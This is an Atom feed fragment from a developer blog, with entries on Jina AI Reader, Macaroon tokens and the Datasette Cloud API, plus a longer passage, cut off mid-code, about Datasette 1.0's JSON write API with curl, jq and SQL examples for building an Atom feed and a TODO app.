&lt;p&gt;&lt;strong&gt;&lt;a href="https://jina.ai/reader/"&gt;Jina AI Reader&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Jina AI provide a number of different AI-related platform products, including an excellent &lt;a href="https://huggingface.co/collections/jinaai/jina-embeddings-v2-65708e3ec4993b8fb968e744"&gt;family of embedding models&lt;/a&gt;, but one of their most instantly useful is Jina Reader, an API for turning any URL into Markdown content suitable for piping into an LLM.&lt;/p&gt;
&lt;p&gt;Add &lt;code&gt;r.jina.ai&lt;/code&gt; to the front of a URL to get back Markdown of that page, for example &lt;a href="https://r.jina.ai/https://simonwillison.net/2024/Jun/16/jina-ai-reader/"&gt;https://r.jina.ai/https://simonwillison.net/2024/Jun/16/jina-ai-reader/&lt;/a&gt; - in addition to converting the content to Markdown it also does a decent job of extracting just the content and ignoring the surrounding navigation.&lt;/p&gt;
&lt;p&gt;The API is free but rate-limited (presumably by IP) to 20 requests per minute without an API key or 200 request per minute with a free API key, and you can pay to increase your allowance beyond that.&lt;/p&gt;
&lt;p&gt;The Apache 2 licensed source code for the hosted service is &lt;a href="https://github.com/jina-ai/reader"&gt;on GitHub&lt;/a&gt; - it's written in TypeScript and &lt;a href="https://github.com/jina-ai/reader/blob/main/backend/functions/src/services/puppeteer.ts"&gt;uses Puppeteer&lt;/a&gt; to run &lt;a href="https://github.com/mozilla/readability"&gt;Readabiliy.js&lt;/a&gt; and &lt;a href="https://github.com/mixmark-io/turndown"&gt;Turndown&lt;/a&gt; against the scraped page.&lt;/p&gt;
&lt;p&gt;It can also handle PDFs, which have their contents extracted &lt;a href="https://github.com/jina-ai/reader/blob/main/backend/functions/src/services/pdf-extract.ts"&gt;using PDF.js&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's also a search feature, &lt;code&gt;s.jina.ai/search+term+goes+here&lt;/code&gt;, which &lt;a href="https://github.com/jina-ai/reader/blob/ed80c9a4a2c340fb7c874347d3f25501e42ca251/backend/functions/src/services/brave-search.ts"&gt;uses the Brave Search API&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/markdown"&gt;markdown&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/puppeteer"&gt;puppeteer&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/jina"&gt;jina&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/brave"&gt;brave&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="markdown"/><category term="ai"/><category term="puppeteer"/><category term="llms"/><category term="jina"/><category term="brave"/></entry><entry><title>Macaroons Escalated Quickly</title><link href="https://simonwillison.net/2024/Jan/31/macaroons-escalated-quickly/#atom-tag" rel="alternate"/><published>2024-01-31T16:57:23+00:00</published><updated>2024-01-31T16:57:23+00:00</updated><id>https://simonwillison.net/2024/Jan/31/macaroons-escalated-quickly/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://fly.io/blog/macaroons-escalated-quickly/"&gt;Macaroons Escalated Quickly&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek’s follow-up on Macaroon tokens, based on a two year project to implement them at Fly.io. The way they let end users calculate new signed tokens with additional limitations applied to them (“caveats” in Macaroon terminology) is fascinating, and allows for some very creative solutions.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=39205676"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/fly"&gt;fly&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="security"/><category term="thomas-ptacek"/><category term="fly"/></entry><entry><title>Getting started with the Datasette Cloud API</title><link href="https://simonwillison.net/2023/Sep/28/getting-started-with-the-datasette-cloud-api/#atom-tag" rel="alternate"/><published>2023-09-28T23:05:55+00:00</published><updated>2023-09-28T23:05:55+00:00</updated><id>https://simonwillison.net/2023/Sep/28/getting-started-with-the-datasette-cloud-api/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.datasette.cloud/blog/2023/datasette-cloud-api/"&gt;Getting started with the Datasette Cloud API&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I wrote an introduction to the Datasette Cloud API for the company blog, with a tutorial showing how to use Python and GitHub Actions to import data from the Federal Register into a table in Datasette Cloud, then configure full-text search against it.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-cloud"&gt;datasette-cloud&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="datasette"/><category term="datasette-cloud"/></entry><entry><title>babelmark3</title><link href="https://simonwillison.net/2023/Jan/27/babelmark3/#atom-tag" rel="alternate"/><published>2023-01-27T23:34:08+00:00</published><updated>2023-01-27T23:34:08+00:00</updated><id>https://simonwillison.net/2023/Jan/27/babelmark3/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://babelmark.github.io/"&gt;babelmark3&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I found this tool today while investigating an bug in Datasette’s datasette-render-markdown plugin: it lets you run a fragment of Markdown through dozens of different Markdown libraries across multiple different languages and compare the results. Under the hood it works with a registry of API URL endpoints for different implementations, most of which are encrypted in the configuration file on GitHub because they are only intended to be used by this comparison tool.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://github.com/simonw/datasette-render-markdown/issues/13#issuecomment-1407181593"&gt;datasette-render-markdown issue #13&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/markdown"&gt;markdown&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="markdown"/></entry><entry><title>Datasette's new JSON write API: The first alpha of Datasette 1.0</title><link href="https://simonwillison.net/2022/Dec/2/datasette-write-api/#atom-tag" rel="alternate"/><published>2022-12-02T23:15:07+00:00</published><updated>2022-12-02T23:15:07+00:00</updated><id>https://simonwillison.net/2022/Dec/2/datasette-write-api/#atom-tag</id><summary type="html">
    &lt;p&gt;This week I published &lt;a href="https://docs.datasette.io/en/latest/changelog.html#a0-2022-11-29"&gt;the first alpha release of Datasette 1.0&lt;/a&gt;, with a significant new feature: Datasette core now includes &lt;a href="https://docs.datasette.io/en/latest/json_api.html#the-json-write-api"&gt;a JSON API&lt;/a&gt; for creating and dropping tables and inserting, updating and deleting data.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/datasette.svg" alt="The Datasette logo" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Combined with Datasette's existing APIs for reading and filtering table data and executing SELECT queries this effectively turns Datasette into a SQLite-backed JSON data layer for any application.&lt;/p&gt;
&lt;p&gt;If you squint at it the right way, you could even describe it as offering a NoSQL interface to a SQL database!&lt;/p&gt;
&lt;p&gt;My initial motivation for this work was to provide an API for loading data into my &lt;a href="https://datasette.cloud/"&gt;Datasette Cloud&lt;/a&gt; SaaS product - but now that I've got it working I'm realizing that it can be applied to a whole host of interesting things.&lt;/p&gt;
&lt;p&gt;I shipped &lt;a href="https://docs.datasette.io/en/latest/changelog.html#a0-2022-11-29"&gt;the 1.0a0 alpha&lt;/a&gt; on Wednesday, then spent the last two days ironing out some bugs (released in &lt;a href="https://docs.datasette.io/en/latest/changelog.html#a1-2022-12-01"&gt;1.0a1&lt;/a&gt;) and building some illustrative demos.&lt;/p&gt;
&lt;h4&gt;Scraping Hacker News to build an atom feed&lt;/h4&gt;
&lt;p&gt;My first demo reuses my &lt;a href="https://github.com/simonw/scrape-hacker-news-by-domain"&gt;scrape-hacker-news-by-domain&lt;/a&gt; project from earlier this year.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://news.ycombinator.com/from?site=simonwillison.net"&gt;https://news.ycombinator.com/from?site=simonwillison.net&lt;/a&gt; is the page on Hacker News that shows submissions from my blog. I like to keep an eye on that page to see if anyone has linked to my work.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/hacker-news-from.jpg" alt="The page lists posts from my blog - the top one has 222 points and 39 comments, but most of the others have 2 or 3 points and no discussion at all." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Data from that page is not currently available through the &lt;a href="https://github.com/HackerNews/API"&gt;official Hacker News API&lt;/a&gt;... but it's in an HTML format that's pretty easy to scrape.&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://shot-scraper.datasette.io/"&gt;shot-scraper&lt;/a&gt; command-line browser automation tool has the ability to execute JavaScript against a web page and return scraped data as JSON.&lt;/p&gt;
&lt;p&gt;I wrote about that in &lt;a href="https://simonwillison.net/2022/Mar/14/scraping-web-pages-shot-scraper/"&gt;Scraping web pages from the command line with shot-scraper&lt;/a&gt;, including a recipe for scraping that Hacker News page that looks like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;shot-scraper javascript \
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;https://news.ycombinator.com/from?site=simonwillison.net&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  -i scrape.js -o simonwillison-net.json&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's that &lt;a href="https://github.com/simonw/scrape-hacker-news-by-domain/blob/main/scrape.js"&gt;scrape.js&lt;/a&gt; script.&lt;/p&gt;
&lt;p&gt;I've been running a &lt;a href="https://simonwillison.net/2020/Oct/9/git-scraping/"&gt;Git scraper&lt;/a&gt; that executes that scraping script using GitHub Actions for several months now, out of my &lt;a href="https://github.com/simonw/scrape-hacker-news-by-domain"&gt;simonw/scrape-hacker-news-by-domain&lt;/a&gt; repository.&lt;/p&gt;
&lt;p&gt;Today I modified that script to also publish the data it has scraped to my personal Datasette Cloud account using the new  API - and then used the &lt;a href="https://datasette.io/plugins/datasette-atom"&gt;datasette-atom&lt;/a&gt; plugin to generate an Atom feed from that data.&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://simon.datasette.cloud/data/hacker_news_posts?_sort_desc=dt"&gt;the new table&lt;/a&gt; in Datasette Cloud.&lt;/p&gt;
&lt;p&gt;This is the &lt;code&gt;bash&lt;/code&gt; script that runs in GitHub Actions and pushes the data to Datasette:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;export&lt;/span&gt; SIMONWILLISON_ROWS=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;$(&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;  jq -n --argjson rows &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;$(&lt;/span&gt;cat simonwillison-net.json&lt;span class="pl-pds"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \&lt;/span&gt;
&lt;span class="pl-s"&gt;  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;{ "rows": $rows, "replace": true }&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;)&lt;/span&gt;&lt;/span&gt;
curl -X POST \
  https://simon.datasette.cloud/data/hacker_news_posts/-/insert \
  -H &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Content-Type: application/json&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  -H &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Authorization: Bearer &lt;span class="pl-smi"&gt;$DS_TOKEN&lt;/span&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  -d &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;span class="pl-smi"&gt;$SIMONWILLISON_ROWS&lt;/span&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;$DS_TOKEN&lt;/code&gt; is an environment variable containing a signed API token, see the &lt;a href="https://docs.datasette.io/en/latest/authentication.html#api-tokens"&gt;API token documentation&lt;/a&gt; for details.&lt;/p&gt;
&lt;p&gt;I'm using &lt;code&gt;jq&lt;/code&gt; here (with a recipe &lt;a href="https://til.simonwillison.net/gpt3/jq"&gt;generated using GPT-3&lt;/a&gt;) to convert the scraped data into the JSON format needeed by the Datasette API. The result looks like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;{
  &lt;span class="pl-ent"&gt;"rows"&lt;/span&gt;: [
    {
      &lt;span class="pl-ent"&gt;"id"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;33762438&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"title"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Coping strategies for the serial project hoarder&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"url"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;https://simonwillison.net/2022/Nov/26/productivity/&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"dt"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;2022-11-27T12:12:56&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: &lt;span class="pl-c1"&gt;222&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"submitter"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;usrme&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"commentsUrl"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;https://news.ycombinator.com/item?id=33762438&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"numComments"&lt;/span&gt;: &lt;span class="pl-c1"&gt;38&lt;/span&gt;
    }
  ],
  &lt;span class="pl-ent"&gt;"replace"&lt;/span&gt;: &lt;span class="pl-c1"&gt;true&lt;/span&gt;
}&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This is then POSTed up to the &lt;code&gt;https://simon.datasette.cloud/data/hacker_news_posts/-/insert&lt;/code&gt; API endpoint.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;"rows"&lt;/code&gt; key is a list of rows to be inserted.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;"replace": true&lt;/code&gt; tells Datasette to replace any existing rows with the same primary key. Without that, the API would return an error if any rows already existed.&lt;/p&gt;
&lt;p&gt;The API also accepts &lt;code&gt;"ignore": true&lt;/code&gt; which will cause it to ignore any rows that already exist.&lt;/p&gt;
&lt;p&gt;Full insert API documentation &lt;a href="https://docs.datasette.io/en/latest/json_api.html#inserting-rows"&gt;is here&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Initially creating the table&lt;/h4&gt;
&lt;p&gt;Before I could insert any rows I needed to create the table.&lt;/p&gt;
&lt;p&gt;I did that from the command-line too, using this recipe:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;export&lt;/span&gt; ROWS=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;$(&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;  jq -n --argjson rows &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;$(&lt;/span&gt;cat simonwillison-net.json&lt;span class="pl-pds"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \&lt;/span&gt;
&lt;span class="pl-s"&gt;  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;{ "table": "hacker_news_posts", "rows": $rows, "pk": "id" }&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Use curl to POST some JSON to a URL&lt;/span&gt;
curl -X POST \
  https://simon.datasette.cloud/data/-/create \
  -H &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Content-Type: application/json&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  -H &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Authorization: Bearer &lt;span class="pl-smi"&gt;$DS_TOKEN&lt;/span&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  -d &lt;span class="pl-smi"&gt;$ROWS&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This uses the same trick as above, but hits a different API endpoint: &lt;code&gt;/data/-/create&lt;/code&gt; which is the endpoint for &lt;a href="https://docs.datasette.io/en/latest/json_api.html#creating-a-table"&gt;creating a table&lt;/a&gt; in the &lt;code&gt;data.db&lt;/code&gt; database.&lt;/p&gt;
&lt;p&gt;The JSON submitted to that endpoint looks like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;{
  &lt;span class="pl-ent"&gt;"table"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;hacker_news_posts&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
  &lt;span class="pl-ent"&gt;"pk"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;id&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
  &lt;span class="pl-ent"&gt;"rows"&lt;/span&gt;: [
    {
      &lt;span class="pl-ent"&gt;"id"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;33762438&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"title"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Coping strategies for the serial project hoarder&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"url"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;https://simonwillison.net/2022/Nov/26/productivity/&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"dt"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;2022-11-27T12:12:56&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: &lt;span class="pl-c1"&gt;222&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"submitter"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;usrme&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"commentsUrl"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;https://news.ycombinator.com/item?id=33762438&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-ent"&gt;"numComments"&lt;/span&gt;: &lt;span class="pl-c1"&gt;38&lt;/span&gt;
    }
  ]
}&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It's almost the same shape as the &lt;code&gt;/-/insert&lt;/code&gt; call above. That's because it's using a feature of the Datasette API inherited from &lt;a href="https://sqlite-utils.datasette.io/"&gt;sqlite-utils&lt;/a&gt; - it can create a table from a list of rows, automatically determining the correct schema.&lt;/p&gt;
&lt;p&gt;If you already know your schema you can pass a &lt;code&gt;"columns": [...]&lt;/code&gt; key instead, but I've found that this kind of automatic schema generation works really well in practice.&lt;/p&gt;
&lt;p&gt;Datasette will let you call the create API like that multiple times, and if the table already exists it will insert new rows directly into the existing tables. I expect this to be a really convenient way to write automation scripts where you don't want to bother checking if the table exists already.&lt;/p&gt;
&lt;h4&gt;Building an Atom feed&lt;/h4&gt;
&lt;p&gt;My end goal with this demo was to build an Atom feed I could subscribe to in my NetNewsWire feed reader.&lt;/p&gt;
&lt;p&gt;I have a plugin for that already: &lt;a href="https://datasette.io/plugins/datasette-atom"&gt;datasette-atom&lt;/a&gt;, which lets you generate an Atom feed for any data in Datasette, defined using a SQL query.&lt;/p&gt;
&lt;p&gt;I created a SQL view for this (using the &lt;a href="https://datasette.io/plugins/datasette-write"&gt;datasette-write&lt;/a&gt; plugin, which is installed on Datasette Cloud):&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;CREATE&lt;/span&gt; &lt;span class="pl-k"&gt;VIEW&lt;/span&gt; &lt;span class="pl-en"&gt;hacker_news_posts_atom&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; &lt;span class="pl-k"&gt;select&lt;/span&gt;
  id &lt;span class="pl-k"&gt;as&lt;/span&gt; atom_id,
  title &lt;span class="pl-k"&gt;as&lt;/span&gt; atom_title,
  url,
  commentsUrl &lt;span class="pl-k"&gt;as&lt;/span&gt; atom_link,
  dt &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;Z&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; atom_updated,
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;Submitter: &lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; submitter &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt; - &lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; points &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt; points, &lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; numComments &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt; comments&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; atom_content
&lt;span class="pl-k"&gt;from&lt;/span&gt;
  hacker_news_posts
&lt;span class="pl-k"&gt;order by&lt;/span&gt;
  dt &lt;span class="pl-k"&gt;desc&lt;/span&gt;
&lt;span class="pl-k"&gt;limit&lt;/span&gt;
  &lt;span class="pl-c1"&gt;100&lt;/span&gt;;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;datasette-atom&lt;/code&gt; requires a table, view or SQL query that returns &lt;code&gt;atom_id&lt;/code&gt;, &lt;code&gt;atom_title&lt;/code&gt; and &lt;code&gt;atom_updated&lt;/code&gt; columns - and will make use of &lt;code&gt;atom_link&lt;/code&gt; and &lt;code&gt;atom_content&lt;/code&gt; as well if they are present.&lt;/p&gt;
&lt;p&gt;Datasette Cloud defaults to keeping all tables and views private - but a while ago I created the &lt;a href="https://datasette.io/plugins/datasette-public"&gt;datasette-public&lt;/a&gt; plugin to provide a UI for making a table public.&lt;/p&gt;
&lt;p&gt;It turned out this didn't work for SQL views yet, so &lt;a href="https://github.com/simonw/datasette-public/issues/5"&gt;I fixed that&lt;/a&gt; - then used that option to make my view public. You can visit it at:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://simon.datasette.cloud/data/hacker_news_posts_atom"&gt;https://simon.datasette.cloud/data/hacker_news_posts_atom&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And to get an Atom feed, just add &lt;code&gt;.atom&lt;/code&gt; to the end of the URL:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://simon.datasette.cloud/data/hacker_news_posts_atom.atom"&gt;https://simon.datasette.cloud/data/hacker_news_posts_atom.atom&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here's what it looks like in NetNewsWire:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/netnewswire-hacker-news.jpg" alt="A screenshot of a feed reading interface, showing posts from Hacker News with the submitter, number of points and number of comments" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I'm pretty excited about being able to combine these tools in this way: it makes getting from scraped data to a Datasette table to an Atom feed a very repeatable process.&lt;/p&gt;
&lt;h4&gt;Building a TODO list application&lt;/h4&gt;
&lt;p&gt;My second demo explores what it looks like to develop custom applications against the new API.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://todomvc.com"&gt;TodoMVC&lt;/a&gt; is a project that provides the same TODO list interface built using dozens of different JavaScript frameworks, as a comparison tool.&lt;/p&gt;
&lt;p&gt;I decided to use it to build my own TODO list application, using Datasette as the backend.&lt;/p&gt;
&lt;p&gt;You can try it out at &lt;a href="https://todomvc.datasette.io/"&gt;https://todomvc.datasette.io/&lt;/a&gt; - but be warned that the demo resets every 15 minutes so don't use it for real task tracking!&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/todomvc.gif" alt="Animated GIF showing a TODO list interface - I add two items to it, then check one of them off as done, then remove the other one" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;The source code for this demo lives in &lt;a href="https://github.com/simonw/todomvc-datasette"&gt;simonw/todomvc-datasette&lt;/a&gt; - which also serves the demo itself using GitHub Pages.&lt;/p&gt;
&lt;p&gt;The code is based on the TodoMVC &lt;a href="https://github.com/tastejs/todomvc/tree/gh-pages/examples/vanillajs"&gt;Vanilla JavaScript example&lt;/a&gt;. I used that unmodified, except for one file - &lt;a href="https://github.com/simonw/todomvc-datasette/blob/main/js/store.js"&gt;store.js&lt;/a&gt;, which I modified to use the Datasette API instead of &lt;code&gt;localStorage&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The demo currently uses a hard-coded authentication token, which is signed to allow actions to be performed against the &lt;a href="https://latest.datasette.io/"&gt;https://latest.datasette.io/&lt;/a&gt; demo instance as a user called &lt;code&gt;todomvc&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;That user is granted permissions &lt;a href="https://github.com/simonw/datasette/blob/cab5b60e09e94aca820dbec5308446a88c99ea3d/tests/plugins/my_plugin.py#L223-L230"&gt;in a custom plugin&lt;/a&gt; at the moment, but I plan to provide a more user-friendly way to do this in the future.&lt;/p&gt;
&lt;p&gt;A couple of illustrative snippets of code. First, on page load this constructor uses the Datasette API to create the table used by the application:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;function&lt;/span&gt; &lt;span class="pl-v"&gt;Store&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;name&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s1"&gt;callback&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
  &lt;span class="pl-s1"&gt;callback&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;callback&lt;/span&gt; &lt;span class="pl-c1"&gt;||&lt;/span&gt; &lt;span class="pl-k"&gt;function&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;

